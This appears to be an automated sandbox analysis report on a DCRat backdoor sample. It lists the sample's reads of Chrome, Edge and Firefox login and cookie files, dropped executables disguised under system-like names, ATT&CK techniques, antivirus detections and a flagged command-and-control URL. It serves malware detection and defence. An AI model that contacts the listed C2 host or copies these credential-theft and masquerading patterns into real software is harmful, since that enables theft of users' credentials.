                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data

                          Remote Access Functionality

                          Source: Yara match File source: zZ1Y43bxxV.exe, type: SAMPLE
                          Source: Yara match File source: 0.0.zZ1Y43bxxV.exe.d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: 00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: zZ1Y43bxxV.exe PID: 6164, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: wnWNWNYIxJtFiUSDRXunzX.exe PID: 7744, type: MEMORYSTR
                          Source: Yara match File source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, type: DROPPED
                          Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, type: DROPPED
                          Source: Yara match File source: C:\Users\Public\UserOOBEBroker.exe, type: DROPPED
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | 1 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 1 Scripting | 12 Process Injection | 233 Masquerading | 1 OS Credential Dumping | 351 Security Software Discovery | Remote Services | 11 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 261 Virtualization/Sandbox Evasion | Security Account Manager | 261 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 145 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          [Behavior graph: Behavior Graph ID: 1583651, Sample: zZ1Y43bxxV.exe, Startdate: 03/01/2025, Architecture: WINDOWS, Score: 100]

                          Source | Detection | Scanner | Label | Link
                          zZ1Y43bxxV.exe | 61% | Virustotal | | Browse
                          zZ1Y43bxxV.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                          zZ1Y43bxxV.exe | 100% | Avira | HEUR/AGEN.1309961
                          zZ1Y43bxxV.exe | 100% | Joe Sandbox ML
                          Source | Detection | Scanner | Label | Link
                          C:\Users\Public\UserOOBEBroker.exe | 100% | Avira | HEUR/AGEN.1309961
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | 100% | Avira | HEUR/AGEN.1309961
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | 100% | Avira | HEUR/AGEN.1309961
                          C:\Users\user\Desktop\GmBsEsrN.log | 100% | Avira | TR/Agent.jbwuj
                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1309961
                          C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat | 100% | Avira | BAT/Delbat.C
                          C:\Users\user\Desktop\CqMurJJc.log | 100% | Avira | TR/AVI.Agent.updqb
                          C:\Users\user\Desktop\ASylWHNt.log | 100% | Avira | TR/AVI.Agent.updqb
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | 100% | Avira | HEUR/AGEN.1309961
                          C:\Users\Public\UserOOBEBroker.exe | 100% | Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | 100% | Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | 100% | Joe Sandbox ML
                          C:\Users\user\Desktop\FpakjsdS.log | 100% | Joe Sandbox ML
                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | 100% | Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                          C:\Users\Public\UserOOBEBroker.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                          C:\Users\user\Desktop\ASylWHNt.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\BtlmWJui.log | 21% | ReversingLabs
                          C:\Users\user\Desktop\CidbNaiX.log | 3% | ReversingLabs
                          C:\Users\user\Desktop\CqMurJJc.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\CzktcvcZ.log | 25% | ReversingLabs
                          C:\Users\user\Desktop\EBWcxehU.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\EfGUsIxp.log | 25% | ReversingLabs
                          C:\Users\user\Desktop\FpakjsdS.log | 9% | ReversingLabs
                          C:\Users\user\Desktop\GmBsEsrN.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\HQmkzWIi.log | 29% | ReversingLabs | Win32.Trojan.Generic
                          C:\Users\user\Desktop\IaGAqGnL.log | 17% | ReversingLabs
                          C:\Users\user\Desktop\JKpAqWmX.log | 17% | ReversingLabs
                          C:\Users\user\Desktop\LGcbGTIb.log | 12% | ReversingLabs
                          C:\Users\user\Desktop\NAfrxSmR.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\NkpshHmC.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\QMyIEiey.log | 25% | ReversingLabs
                          C:\Users\user\Desktop\QVVIoUxv.log | 8% | ReversingLabs
                          C:\Users\user\Desktop\RrWiEPnK.log | 8% | ReversingLabs
                          C:\Users\user\Desktop\TxdZLwor.log | 12% | ReversingLabs
                          C:\Users\user\Desktop\UhMZMMnD.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\VDeRaRWG.log | 29% | ReversingLabs
                          C:\Users\user\Desktop\XriZMeSE.log | 9% | ReversingLabs
                          C:\Users\user\Desktop\YXDPTJnw.log | 9% | ReversingLabs
                          C:\Users\user\Desktop\YoKhhehz.log | 8% | ReversingLabs
                          C:\Users\user\Desktop\aEoYYxCd.log | 21% | ReversingLabs
                          C:\Users\user\Desktop\bfAYobhs.log | 21% | ReversingLabs
                          C:\Users\user\Desktop\cNtGaFop.log | 16% | ReversingLabs
                          C:\Users\user\Desktop\eYPHaYTq.log | 25% | ReversingLabs
                          C:\Users\user\Desktop\fijXRHyU.log | 29% | ReversingLabs | Win32.Trojan.Generic
                          C:\Users\user\Desktop\frGXBuRR.log | 8% | ReversingLabs
                          C:\Users\user\Desktop\iGWfDlte.log | 25% | ReversingLabs
                          C:\Users\user\Desktop\iOGyhUTj.log | 21% | ReversingLabs
                          C:\Users\user\Desktop\jUEFnHBb.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\jeYWdqhF.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\kdkoYnoN.log | 8% | ReversingLabs
                          C:\Users\user\Desktop\lJFefRJG.log | 16% | ReversingLabs
                          C:\Users\user\Desktop\mpuXdJMF.log | 17% | ReversingLabs
                          C:\Users\user\Desktop\nUbffkpH.log | 25% | ReversingLabs
                          C:\Users\user\Desktop\oyzEfRxS.log | 17% | ReversingLabs
                          C:\Users\user\Desktop\rLFDskhr.log | 5% | ReversingLabs
                          C:\Users\user\Desktop\rpqvmOyM.log | 8% | ReversingLabs
                          C:\Users\user\Desktop\urceIxCH.log | 5% | ReversingLabs
                          C:\Users\user\Desktop\vYOmNlRn.log | 29% | ReversingLabs
                          C:\Users\user\Desktop\voDmexRC.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\wGHUzQXl.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\xuLckdTj.log | 9% | ReversingLabs
                          C:\Users\user\Desktop\ymdvPcsA.log | 3% | ReversingLabs
                          C:\Users\user\Desktop\zeucltSv.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label | Link
                          http://crl.mic4% | 0% | Avira URL Cloud | safe
                          http://86.110.194.28 | 0% | Avira URL Cloud | safe
                          http://86.110.H | 0% | Avira URL Cloud | safe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php | 100% | Avira URL Cloud | malware
                          http://crl.micJ | 0% | Avira URL Cloud | safe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind | 0% | Avira URL Cloud | safe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/ | 0% | Avira URL Cloud | safe
                          http://86.110.Hjj | 0% | Avira URL Cloud | safe
                          http://crl.mic8 | 0% | Avira URL Cloud | safe
                          No contacted domains info
                          Name | Malicious | Antivirus Detection | Reputation
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php | true | Avira URL Cloud: malware | unknown
                          Name | Source | Malicious | Antivirus Detection | Reputation
                          https://duckduckgo.com/chrome_newtab | wnWNWNYIxJtFiUSDRXunzX.exe, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.dr | false | | high
                          https://support.mozilla.org/products/firefoxgro.allizom.troppus. | zvXrErQ5GYDFwyPcM5nqV0.16.dr | false | | high
                          http://www.fontbureau.com/designersG | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          https://duckduckgo.com/ac/?q= | wnWNWNYIxJtFiUSDRXunzX.exe, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.dr | false | | high
                          http://www.fontbureau.com/designers/? | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          http://www.founder.com.cn/cn/bThe | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          http://www.fontbureau.com/designers? | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe | false | | high
                          https://contoso.com/License | powershell.exe | false | | high
                          http://www.tiro.com | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          http://crl.mic4% | powershell.exe | false | Avira URL Cloud: safe | unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | wnWNWNYIxJtFiUSDRXunzX.exe, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.dr | false | | high
                          http://www.fontbureau.com/designers | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          http://www.goodfont.co.kr | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                          http://86.110.194.28 | wnWNWNYIxJtFiUSDRXunzX.exe | true | Avira URL Cloud: safe | unknown
                          http://www.sajatypeworks.com | wnWNWNYIxJtFiUSDRXunzX.exe | false | | high
                                                        http://www.typography.netDwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cThewnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htmwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.microsopowershell.exe, 00000006.00000002.2581210774.0000027760BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
